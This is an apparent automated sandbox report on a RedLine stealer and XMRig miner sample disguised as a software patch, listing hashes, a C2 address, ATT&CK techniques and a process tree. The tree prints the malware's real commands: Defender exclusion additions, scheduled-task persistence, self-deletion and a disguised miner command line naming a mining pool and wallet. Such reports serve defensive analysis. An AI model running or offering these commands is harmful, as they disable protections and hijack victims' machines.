redline | c6897ee5e6e0c63e0cf1866460859894664359d397f9d453546adf12c7794818

Analysis

max time kernel
150s
max time network
132s
platform
windows10_x64
resource
win10v20210410
submitted
11-08-2021 12:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software patch v2.0.5.exe
Size

3.1MB
MD5

d03337f5bb060e48c67e625084d48a84
SHA1

89d89fe1aeb5b69b2e5e9fdea533c4e32e5ae887
SHA256

010e5cf08f24b0b769747b20d38324e7ea5b3633cc72832a07cb8769b126dd0f
SHA512

4106c6922d175bbaa947a0a03783d39fe44936fa7ec5079dafece596f8378f326b0f094c0433f3f363aaad9ed6f81c7da5273347abc18031c88be79fe3c4ea56

Score

10^/10

redline xmrig @faqu_1 discovery evasion infostealer miner spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

@faqu_1

45.82.179.116:10425

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\intobroker.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\intobroker.exe	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral14/memory/2700-897-0x00000001402F327C-mapping.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

cmd.exe

flow pid process

29 2700 cmd.exe
Downloads MZ/PE file

flow	pid	process
29	2700	cmd.exe

Executes dropped EXE 11 IoCs

Processes:

Datafile32.exeDatafile64.exeintobroker.exesvchost32.exesvchost64.exeservices32.exeservices64.exesvchost32.exesihost32.exesvchost64.exesihost64.exe

pid	process
3708	Datafile32.exe
2356	Datafile64.exe
2108	intobroker.exe
2504	svchost32.exe
2152	svchost64.exe
3576	services32.exe
2588	services64.exe
2220	svchost32.exe
3964	sihost32.exe
1424	svchost64.exe
2744	sihost64.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Software patch v2.0.5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Software patch v2.0.5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Software patch v2.0.5.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral14/memory/4092-115-0x0000000001230000-0x0000000001231000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Software patch v2.0.5.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software patch v2.0.5.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Software patch v2.0.5.exe

Drops file in System32 directory 9 IoCs

Processes:

svchost64.exesvchost32.exesvchost32.exesvchost64.exe

description	ioc	process
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	svchost64.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.log	svchost64.exe
File created	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe
File created	C:\Windows\system32\services64.exe	svchost64.exe
File opened for modification	C:\Windows\system32\services64.exe	svchost64.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	svchost64.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Software patch v2.0.5.exe

pid process

4092 Software patch v2.0.5.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost64.exe

description pid process target process

PID 1424 set thread context of 2700 1424 svchost64.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2500 schtasks.exe
1504 schtasks.exe
580 schtasks.exe
3152 schtasks.exe

pid	process
4092	Software patch v2.0.5.exe

description	pid	process	target process
PID 1424 set thread context of 2700	1424	svchost64.exe	cmd.exe

pid	process
2500	schtasks.exe
1504	schtasks.exe
580	schtasks.exe
3152	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeintobroker.exesvchost32.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost32.exesvchost64.execmd.exe

pid	process
3400	powershell.exe
3400	powershell.exe
3616	powershell.exe
3400	powershell.exe
3616	powershell.exe
3616	powershell.exe
3264	powershell.exe
4032	powershell.exe
4032	powershell.exe
3264	powershell.exe
4032	powershell.exe
3264	powershell.exe
656	powershell.exe
2084	powershell.exe
2084	powershell.exe
656	powershell.exe
2084	powershell.exe
656	powershell.exe
1888	powershell.exe
3560	powershell.exe
3560	powershell.exe
1888	powershell.exe
1888	powershell.exe
3560	powershell.exe
2108	intobroker.exe
2108	intobroker.exe
2504	svchost32.exe
2152	svchost64.exe
2068	powershell.exe
2068	powershell.exe
4040	powershell.exe
2068	powershell.exe
4040	powershell.exe
4040	powershell.exe
3088	powershell.exe
3088	powershell.exe
1144	powershell.exe
3088	powershell.exe
1144	powershell.exe
1144	powershell.exe
2240	powershell.exe
2240	powershell.exe
2116	powershell.exe
2116	powershell.exe
2240	powershell.exe
2116	powershell.exe
2200	powershell.exe
3396	powershell.exe
2200	powershell.exe
3396	powershell.exe
3396	powershell.exe
2200	powershell.exe
2220	svchost32.exe
1424	svchost64.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Software patch v2.0.5.exepowershell.exepowershell.exeintobroker.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4092	Software patch v2.0.5.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	2108	intobroker.exe
Token: SeIncreaseQuotaPrivilege	3400	powershell.exe
Token: SeSecurityPrivilege	3400	powershell.exe
Token: SeTakeOwnershipPrivilege	3400	powershell.exe
Token: SeLoadDriverPrivilege	3400	powershell.exe
Token: SeSystemProfilePrivilege	3400	powershell.exe
Token: SeSystemtimePrivilege	3400	powershell.exe
Token: SeProfSingleProcessPrivilege	3400	powershell.exe
Token: SeIncBasePriorityPrivilege	3400	powershell.exe
Token: SeCreatePagefilePrivilege	3400	powershell.exe
Token: SeBackupPrivilege	3400	powershell.exe
Token: SeRestorePrivilege	3400	powershell.exe
Token: SeShutdownPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeSystemEnvironmentPrivilege	3400	powershell.exe
Token: SeRemoteShutdownPrivilege	3400	powershell.exe
Token: SeUndockPrivilege	3400	powershell.exe
Token: SeManageVolumePrivilege	3400	powershell.exe
Token: 33	3400	powershell.exe
Token: 34	3400	powershell.exe
Token: 35	3400	powershell.exe
Token: 36	3400	powershell.exe
Token: SeIncreaseQuotaPrivilege	3616	powershell.exe
Token: SeSecurityPrivilege	3616	powershell.exe
Token: SeTakeOwnershipPrivilege	3616	powershell.exe
Token: SeLoadDriverPrivilege	3616	powershell.exe
Token: SeSystemProfilePrivilege	3616	powershell.exe
Token: SeSystemtimePrivilege	3616	powershell.exe
Token: SeProfSingleProcessPrivilege	3616	powershell.exe
Token: SeIncBasePriorityPrivilege	3616	powershell.exe
Token: SeCreatePagefilePrivilege	3616	powershell.exe
Token: SeBackupPrivilege	3616	powershell.exe
Token: SeRestorePrivilege	3616	powershell.exe
Token: SeShutdownPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeSystemEnvironmentPrivilege	3616	powershell.exe
Token: SeRemoteShutdownPrivilege	3616	powershell.exe
Token: SeUndockPrivilege	3616	powershell.exe
Token: SeManageVolumePrivilege	3616	powershell.exe
Token: 33	3616	powershell.exe
Token: 34	3616	powershell.exe
Token: 35	3616	powershell.exe
Token: 36	3616	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeIncreaseQuotaPrivilege	3264	powershell.exe
Token: SeSecurityPrivilege	3264	powershell.exe
Token: SeTakeOwnershipPrivilege	3264	powershell.exe
Token: SeLoadDriverPrivilege	3264	powershell.exe
Token: SeSystemProfilePrivilege	3264	powershell.exe
Token: SeSystemtimePrivilege	3264	powershell.exe
Token: SeProfSingleProcessPrivilege	3264	powershell.exe
Token: SeIncBasePriorityPrivilege	3264	powershell.exe
Token: SeCreatePagefilePrivilege	3264	powershell.exe
Token: SeBackupPrivilege	3264	powershell.exe
Token: SeRestorePrivilege	3264	powershell.exe
Token: SeShutdownPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeSystemEnvironmentPrivilege	3264	powershell.exe
Token: SeRemoteShutdownPrivilege	3264	powershell.exe
Token: SeUndockPrivilege	3264	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software patch v2.0.5.exeDatafile32.execmd.exeDatafile64.execmd.execmd.exesvchost32.execmd.execmd.exesvchost64.execmd.exeservices32.execmd.execmd.exeservices64.execmd.execmd.exe

description	pid	process	target process
PID 4092 wrote to memory of 3708	4092	Software patch v2.0.5.exe	Datafile32.exe
PID 4092 wrote to memory of 3708	4092	Software patch v2.0.5.exe	Datafile32.exe
PID 3708 wrote to memory of 2848	3708	Datafile32.exe	cmd.exe
PID 3708 wrote to memory of 2848	3708	Datafile32.exe	cmd.exe
PID 2848 wrote to memory of 3400	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 3400	2848	cmd.exe	powershell.exe
PID 4092 wrote to memory of 2356	4092	Software patch v2.0.5.exe	Datafile64.exe
PID 4092 wrote to memory of 2356	4092	Software patch v2.0.5.exe	Datafile64.exe
PID 2356 wrote to memory of 1512	2356	Datafile64.exe	cmd.exe
PID 2356 wrote to memory of 1512	2356	Datafile64.exe	cmd.exe
PID 4092 wrote to memory of 2108	4092	Software patch v2.0.5.exe	intobroker.exe
PID 4092 wrote to memory of 2108	4092	Software patch v2.0.5.exe	intobroker.exe
PID 4092 wrote to memory of 2108	4092	Software patch v2.0.5.exe	intobroker.exe
PID 1512 wrote to memory of 3616	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 3616	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 3264	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 3264	1512	cmd.exe	powershell.exe
PID 2848 wrote to memory of 4032	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 4032	2848	cmd.exe	powershell.exe
PID 1512 wrote to memory of 656	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 656	1512	cmd.exe	powershell.exe
PID 2848 wrote to memory of 2084	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 2084	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 3560	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 3560	2848	cmd.exe	powershell.exe
PID 1512 wrote to memory of 1888	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 1888	1512	cmd.exe	powershell.exe
PID 3708 wrote to memory of 1828	3708	Datafile32.exe	cmd.exe
PID 3708 wrote to memory of 1828	3708	Datafile32.exe	cmd.exe
PID 1828 wrote to memory of 2504	1828	cmd.exe	svchost32.exe
PID 1828 wrote to memory of 2504	1828	cmd.exe	svchost32.exe
PID 2356 wrote to memory of 4064	2356	Datafile64.exe	cmd.exe
PID 2356 wrote to memory of 4064	2356	Datafile64.exe	cmd.exe
PID 2504 wrote to memory of 3188	2504	svchost32.exe	cmd.exe
PID 2504 wrote to memory of 3188	2504	svchost32.exe	cmd.exe
PID 4064 wrote to memory of 2152	4064	cmd.exe	svchost64.exe
PID 4064 wrote to memory of 2152	4064	cmd.exe	svchost64.exe
PID 3188 wrote to memory of 3152	3188	cmd.exe	schtasks.exe
PID 3188 wrote to memory of 3152	3188	cmd.exe	schtasks.exe
PID 2152 wrote to memory of 2772	2152	svchost64.exe	cmd.exe
PID 2152 wrote to memory of 2772	2152	svchost64.exe	cmd.exe
PID 2772 wrote to memory of 2500	2772	cmd.exe	schtasks.exe
PID 2772 wrote to memory of 2500	2772	cmd.exe	schtasks.exe
PID 2504 wrote to memory of 3576	2504	svchost32.exe	services32.exe
PID 2504 wrote to memory of 3576	2504	svchost32.exe	services32.exe
PID 2504 wrote to memory of 2236	2504	svchost32.exe	cmd.exe
PID 2504 wrote to memory of 2236	2504	svchost32.exe	cmd.exe
PID 3576 wrote to memory of 2724	3576	services32.exe	cmd.exe
PID 3576 wrote to memory of 2724	3576	services32.exe	cmd.exe
PID 2724 wrote to memory of 2068	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2068	2724	cmd.exe	powershell.exe
PID 2236 wrote to memory of 4072	2236	cmd.exe	choice.exe
PID 2236 wrote to memory of 4072	2236	cmd.exe	choice.exe
PID 2152 wrote to memory of 2588	2152	svchost64.exe	services64.exe
PID 2152 wrote to memory of 2588	2152	svchost64.exe	services64.exe
PID 2152 wrote to memory of 2732	2152	svchost64.exe	cmd.exe
PID 2152 wrote to memory of 2732	2152	svchost64.exe	cmd.exe
PID 2588 wrote to memory of 3480	2588	services64.exe	cmd.exe
PID 2588 wrote to memory of 3480	2588	services64.exe	cmd.exe
PID 2732 wrote to memory of 736	2732	cmd.exe	choice.exe
PID 2732 wrote to memory of 736	2732	cmd.exe	choice.exe
PID 3480 wrote to memory of 4040	3480	cmd.exe	powershell.exe
PID 3480 wrote to memory of 4040	3480	cmd.exe	powershell.exe
PID 2724 wrote to memory of 3088	2724	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4092

C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
6⤵
- Creates scheduled task(s)
PID:3152

C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
6⤵
PID:2772

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
8⤵
PID:2888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
9⤵
- Creates scheduled task(s)
PID:1504

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
8⤵
- Executes dropped EXE
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
8⤵
PID:2708

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:3544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:4072

C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4064

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:2500

C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:3480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
6⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
8⤵
PID:2080

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
9⤵
- Creates scheduled task(s)
PID:580

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
8⤵
- Executes dropped EXE
PID:2744

C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9CnVX+ALijX6xMxSjb1GpdkRKRzu9R9fDFnn2Jk5tiB521c56MeySJCVvaV5sI5rrRsTcEJRRsj0lVopee3kzDJD3W6xwTmhYz+Ng/th6kws=" --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
8⤵
PID:2732

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:736

C:\Users\Admin\AppData\Local\Temp\intobroker.exe
"C:\Users\Admin\AppData\Local\Temp\intobroker.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
